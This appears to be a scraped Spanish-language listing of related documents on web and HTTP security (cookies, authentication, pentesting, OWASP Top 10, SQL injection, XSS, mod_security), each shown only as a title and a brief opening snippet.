Tema 4. II - Cookies. Arquitecturas Distribuidas 11/12

Tema 4. II - Cookies. Arquitecturas Distribuidas 11/12 Tema 4. II - Cookies Arquitecturas Distribuidas 11/12 1 II. Cookies 1. Necesidad de mantener información de estado y HTTP 2. Sesiones 3. Qué son las cookies? 4. Funcionamiento de cookies 5. Envío de cookies

Más detalles

AUTENTIFICACIÓN HTTP

AUTENTIFICACIÓN HTTP AUTENTIFICACIÓN HTTP Emilio Casbas. 18/1/2006 INTRODUCCIÓN. 1. Autentificación digest 2. Autentificación básica 2.1Ejemplo práctico. 3. Autentificación proxy 3.1Ejemplo práctico 4. Conclusiones INTRODUCCIÓN.

Más detalles

PROTOCOLOS HTTP Y HTTPS

PROTOCOLOS HTTP Y HTTPS Universidad Nacional Experimental Del Táchira (UNET) Decanato De Docencia Departamento de Ingeniería Informática Asignatura: Comunicaciones 1 18/7/2014 PROTOCOLOS HTTP Y HTTPS Autores: Jessica Ramírez

Más detalles

Penetration Testing. Conceptos generales y situación actual. PwC

Penetration Testing. Conceptos generales y situación actual. PwC Penetration Testing Conceptos generales y situación actual A/S Rodrigo Guirado, CISA, CGEIT Senior Manager Advisory Services rodrigo.guirado@uy.pwc.com PwC Agenda / Contenido Motivación Definiciones Generales

Más detalles

WEB Y HTTP. HTTP: Hypertext Transfer Protocol [RFC 1945] [RFC 2616] Web Page URL (Uniform/Universal Resource Identifier)

WEB Y HTTP. HTTP: Hypertext Transfer Protocol [RFC 1945] [RFC 2616] Web Page URL (Uniform/Universal Resource Identifier) WEB Y HTTP Al comienzo de los 90 Prodigy, america online, compuserve, redes de datos nacionales, x.25, framerelay Télefono 1870, radio/televisión broadcast- 1920, 1930, Web Web: Forms, javascript, java

Más detalles

Offensive State Auditoría de Aplicaciones Web

Offensive State Auditoría de Aplicaciones Web Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4

Más detalles

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos

Más detalles

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion

Más detalles

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS Capítulo 2 Sistemas de Detección de Intrusos 7 CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS En este capítulo se definen los sistemas de detección de intrusos y su relación con los ataques basados en el

Más detalles

Seguridad en servidores Web. Módulo mod_security

Seguridad en servidores Web. Módulo mod_security Erica Lloves Calviño Francisco José Ribadas Pena elloves@uvigo.es ribadas@uvigo.es Departamento de Informática Universidade de Vigo Seguridad en servidores Web. Módulo mod_security Ferramentas de seguridade

Más detalles

UD 4: Instalación y administración de servicios Web SRI

UD 4: Instalación y administración de servicios Web SRI Instalación y administración de servicios Web SRI RESULTADOS DE APRENDIZAJE Administra servidores Web aplicando criterios de configuración y asegurando el funcionamiento del servicio. Introducción - WWW

Más detalles

SERVIDOR WEB MULTIPLATAFORMA CON IMPLEMENTACIÓN CGI

SERVIDOR WEB MULTIPLATAFORMA CON IMPLEMENTACIÓN CGI SERVIDOR WEB MULTIPLATAFORMA CON IMPLEMENTACIÓN CGI C.U. Loraine E. Gimson Saravia a, C.U. Julián J. Fernández b L.I.D.T.I. Universidad Nacional de Salta. Facultad de Ciencias Exactas a E-Mail: saraviag@unsa.edu.ar

Más detalles

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática. SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones

Más detalles

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl no asume responsabilidades o garantías sobre el contenido y uso de ésta documentación y declina cualquier garantía explicita o implícita de comercialidad

Más detalles

Inseguridad de los sistemas de autenticación en aplicaciones web

Inseguridad de los sistemas de autenticación en aplicaciones web Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz vaguilera@isecauditors.com Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias

Más detalles

Challenge/Response en Windows NT

Challenge/Response en Windows NT Trabajo práctico final Challenge/Response en Windows NT Materia: 66.69 Criptografía y seguridad informática Facultad de Ingeniería Universidad de Buenos Aires Alumnos: Lucas P. Diodati (70878) Darío A.

Más detalles

Introducción a las Redes de Computadoras

Introducción a las Redes de Computadoras Introducción a las Redes de Computadoras Capitulo 2 Capa de Aplicación Nota acerca de las transparencias del curso: Estas transparencias están basadas en el sitio web que acompaña el libro, y han sido

Más detalles

CodeSeeker Un Firewall de Nivel 7 OpenSource

CodeSeeker Un Firewall de Nivel 7 OpenSource Índice OWASP Proyectos de la OWASP: Desarrollo Documentación oportal VulnXML WAS-XML WebGoat Conceptos de Redes TCP/IP Firewalls Tipos de Firewalls CodeSeeker Funcionalidades actuales Funcionalidades futuras

Más detalles

Capa de Aplicación (Parte 2 de 2)

Capa de Aplicación (Parte 2 de 2) Capa de Aplicación (Parte 2 de 2) Redes de Computadoras HTTP (Hypertext Transfer Protocol) 1 Qué es Internet? Internet conecta a un conjunto de redes usando protocolos estándar Protocolos de enrutamiento,

Más detalles

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Denise Betancourt Sandoval Omar Alí Domínguez Cabañas Rodrigo Augusto Ortiz Ramón Problemática Pruebas de penetración como una

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS

WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS WHITEPAPER AUMENTANDO LA SEGURIDAD DE WORDPRESS Índice Overview 4 Introducción 5 Qué es un CMS? Quién usa WordPress? Vulnerabilidades en WordPress Medidas de seguridad básicas 6-7 Mantener WordPress y

Más detalles

Seguridad de un Portal

Seguridad de un Portal Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2

Más detalles

abacformacio@abacformacio.com

abacformacio@abacformacio.com Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

PONTIFICIA UNIVERSIDAD CATÓLICA DEL ECUADOR FACULTAD DE INGENIERÍA MAESTRÍA EN REDES DE COMUNICACIÓN

PONTIFICIA UNIVERSIDAD CATÓLICA DEL ECUADOR FACULTAD DE INGENIERÍA MAESTRÍA EN REDES DE COMUNICACIÓN PONTIFICIA UNIVERSIDAD CATÓLICA DEL ECUADOR FACULTAD DE INGENIERÍA MAESTRÍA EN REDES DE COMUNICACIÓN PERFIL DEL TRABAJO PREVIO LA OBTENCIÓN DEL TÍTULO DE: MÁGISTER EN REDES DE COMUNICACIÓN TEMA: ESTUDIO

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Práctica IV Anexo sobre protocolos

Práctica IV Anexo sobre protocolos Práctica IV Este material es un extracto del material correspondiente de las asignaturas Comunicación de Datos y Redes de Computadores Fecha modificación: 27/11/2009 1 Bibliografía. Redes de Computadoras.

Más detalles

Seguridad, Web y Java

Seguridad, Web y Java 2 Seguridad, Web y Java Seguridad, Web y Java Daniel López Janáriz d.lopez@uib.es Seguridad, Web y Java 3 1. Introducción: Puntos a tener en cuenta cuando hablamos de seguridad La seguridad al 100% no

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

Curso: (30227) Seguridad Informática

Curso: (30227) Seguridad Informática Curso: (30227) Seguridad Informática Fernando Tricas García Departamento de Informática e Ingeniería de Sistemas Universidad de Zaragoza http://webdiis.unizar.es/~ftricas/ http://moodle.unizar.es/ ftricas@unizar.es

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

b1010 formas de escribir código (in)seguro

b1010 formas de escribir código (in)seguro b1010 formas de escribir código (in)seguro 1 Lic. Cristian Borghello, CISSP - MVP www.segu-info.com.ar @seguinfo Temario Redes externas vs internas Bugs simples Validación de archivos XSS y SQL Injection

Más detalles

Capítulo V. Seguridad de un portal

Capítulo V. Seguridad de un portal Capítulo V Seguridad de un portal Capítulo V Seguridad del portal 261 Seguridad del Portal Los portales WEB se ven expuestos a un creciente número de amenazas y vulnerabilidades que pueden afectar la

Más detalles

ISEC Lab #4. Firewall de Aplicación con Mod_Security. Christian Martorella cmartorella@isecauditors.com

ISEC Lab #4. Firewall de Aplicación con Mod_Security. Christian Martorella cmartorella@isecauditors.com ISEC Lab #4 Firewall de Aplicación con Mod_Security Christian Martorella cmartorella@isecauditors.com Índice 1.Introducción...3 2. Qué es y para que sirve?...4 3.Ventajas... 5 4.Características y Funcionalidades...6

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del

Más detalles

==== Introducción. ==== Buscando un fallo

==== Introducción. ==== Buscando un fallo =============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================

Más detalles

Administración de sitios Web. Capítulo 8. Servidores Web: Internet Information Server

Administración de sitios Web. Capítulo 8. Servidores Web: Internet Information Server 1 of 9 4/15/2010 9:47 PM Anterior Administración de sitios Web Capítulo 8. Servidores Web: Internet Information Server Siguiente En este punto, nos centraremos en las tareas de administración del servidor

Más detalles

Grupo Sniffer de Proxy HTTP/HTTPS

Grupo Sniffer de Proxy HTTP/HTTPS Trabajo Práctico 05 de Agosto de 2012 Seguridad de la Información Grupo Sniffer de Proxy HTTP/HTTPS Integrante LU Correo electrónico Di Pietro, Carlos Augusto Lyon 126/08 cdipietro@dc.uba.ar Marasca, Dardo

Más detalles

XPERTO EN DISEÑO DE PÁGINAS WEB

XPERTO EN DISEÑO DE PÁGINAS WEB Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados

Más detalles